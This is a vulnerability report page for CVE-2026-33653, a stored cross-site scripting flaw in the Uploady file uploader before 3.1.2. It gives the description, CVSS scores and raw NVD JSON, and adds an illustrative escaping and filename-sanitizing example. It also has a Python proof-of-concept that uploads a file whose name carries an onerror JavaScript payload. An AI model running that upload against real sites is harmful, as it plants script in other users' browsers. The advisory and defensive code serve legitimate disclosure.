Security Vulnerability Report
CVE-2026-33653 CVSS 4.6 MEDIUM


Published: 2026-03-26 22:16:29
Last Modified: 2026-04-10 14:27:58

Description

Uploady is a file uploader script with multi-file upload support. A Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 3.1.2 due to improper sanitization of filenames during the file upload process. An attacker can upload a file with a malicious filename containing JavaScript code, which is later rendered in the application without proper escaping. When the filename is displayed in the file list or file details page, the malicious script executes in the browser of any user who views the page. Version 3.1.2 fixes the issue.
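A minimal illustration of the bug class described above, added here as example code (not Uploady's own code): the vulnerable way of rendering an uploaded filename beside the escaped rendering, plus a hypothetical storage-side filename sanitizer; the sample filenames are constructed.

```python
import html
import re
import unicodedata

# Constructed sample names: an ordinary one, a script-bearing one of the kind
# the advisory describes, and a path-traversal-style one for the sanitizer.
SAMPLE_FILENAMES = [
    "report.pdf",
    "<img src=x onerror=alert('XSS')>.png",
    "../../etc/passwd.txt",
]


def render_file_list_unsafe(filenames):
    """Vulnerable pattern: user-controlled names are interpolated into HTML verbatim,
    so a name containing markup becomes live markup in every viewer's browser."""
    return "".join(f"<li>{name}</li>" for name in filenames)


def render_file_list_safe(filenames):
    """Hardened pattern: HTML-escape at the output boundary, whatever was stored."""
    return "".join(f"<li>{html.escape(name, quote=True)}</li>" for name in filenames)


def sanitize_filename(name, max_len=100):
    """Hypothetical storage-side normaliser (not Uploady's): keep only the final path
    component, apply a conservative character allowlist, and never return an empty name.
    This is defence in depth; it does not replace escaping at render time."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1]
    base = unicodedata.normalize("NFKC", base)      # fold fullwidth/compatibility forms
    base = re.sub(r"[^A-Za-z0-9._-]", "_", base)    # allowlist, replace everything else
    base = base.strip("._") or "unnamed"            # no hidden files, no "..", no empties
    return base[:max_len]


def leaks_raw_tag(rendered_html, tag="<img"):
    """True if the rendered page still contains the raw tag, i.e. the XSS survived."""
    return tag in rendered_html


if __name__ == "__main__":
    print("unsafe leaks tag:", leaks_raw_tag(render_file_list_unsafe(SAMPLE_FILENAMES)))
    print("safe leaks tag:  ", leaks_raw_tag(render_file_list_safe(SAMPLE_FILENAMES)))
    for n in SAMPLE_FILENAMES:
        print(repr(n), "->", sanitize_filename(n))
```

Note that sanitizing only at upload time leaves filenames stored before the fix untouched, so the render-time escaping is the part that actually closes the hole.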

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:farisc0de:uploady:*:*:*:*:*:*:*:* - VULNERABLE (Uploady < 3.1.2)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests


def exploit_uploady_xss(target_url):
    """
    PoC for CVE-2026-33653 (Stored XSS in Uploady)
    This script uploads a file with a malicious filename to trigger XSS.
    """
    upload_endpoint = f"{target_url}/upload"  # Adjust endpoint based on actual install

    # Construct a malicious filename containing JavaScript
    # Using <img> tag often bypasses simple filters and is effective for PoC
    malicious_filename = "<img src=x onerror=alert('XSS')>.png"

    # Create a dummy file content
    files = {
        'file': (malicious_filename, b'dummy content', 'image/png')
    }

    try:
        response = requests.post(upload_endpoint, files=files)
        if response.status_code == 200:
            print(f"[+] File uploaded successfully. Visit the file list page at {target_url} to verify XSS.")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Replace with the actual target URL
    target = "http://localhost:8080"
    exploit_uploady_xss(target)
```

References

https://github.com/farisc0de/Uploady/commit/e4b4dbec0b45304b5ab01e36a1003d0c7cc613d5 (Patch)
https://github.com/farisc0de/Uploady/releases/tag/v3.1.2 (Product, Release Notes)
https://github.com/farisc0de/Uploady/security/advisories/GHSA-2834-m7xm-fqr5 (Exploit, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33653",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T22:16:29.220",
    "lastModified": "2026-04-10T14:27:58.470",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Ulloady is a file uploader script with multi-file upload support. A Stored Cross-Site Scripting (XSS) vulnerability exists in versions prior to 3.1.2 due to improper sanitization of filenames during the file upload process. An attacker can upload a file with a malicious filename containing JavaScript code, which is later rendered in the application without proper escaping. When the filename is displayed in the file list or file details page, the malicious script executes in the browser of any user who views the page. Version 3.1.2 fixes the issue."},
      {"lang": "es", "value": "Ulloady es un script de carga de archivos con soporte para carga de múltiples archivos. Una vulnerabilidad de cross-site scripting (XSS) almacenado existe en versiones anteriores a la 3.1.2 debido a una sanitización inadecuada de los nombres de archivo durante el proceso de carga de archivos. Un atacante puede cargar un archivo con un nombre de archivo malicioso que contiene código JavaScript, el cual luego se renderiza en la aplicación sin el escape adecuado. Cuando el nombre de archivo se muestra en la lista de archivos o en la página de detalles del archivo, el script malicioso se ejecuta en el navegador de cualquier usuario que ve la página. La versión 3.1.2 corrige el problema."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.1,
          "impactScore": 2.5
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"},
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:farisc0de:uploady:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.2", "matchCriteriaId": "6F48E1F2-1F58-4FF9-B8F0-1AFFE0182D5E"}]}]}
    ],
    "references": [
      {"url": "https://github.com/farisc0de/Uploady/commit/e4b4dbec0b45304b5ab01e36a1003d0c7cc613d5", "source": "[email protected]", "tags": ["Patch"]},
      {"url": "https://github.com/farisc0de/Uploady/releases/tag/v3.1.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]},
      {"url": "https://github.com/farisc0de/Uploady/security/advisories/GHSA-2834-m7xm-fqr5", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}
    ]
  }
}
```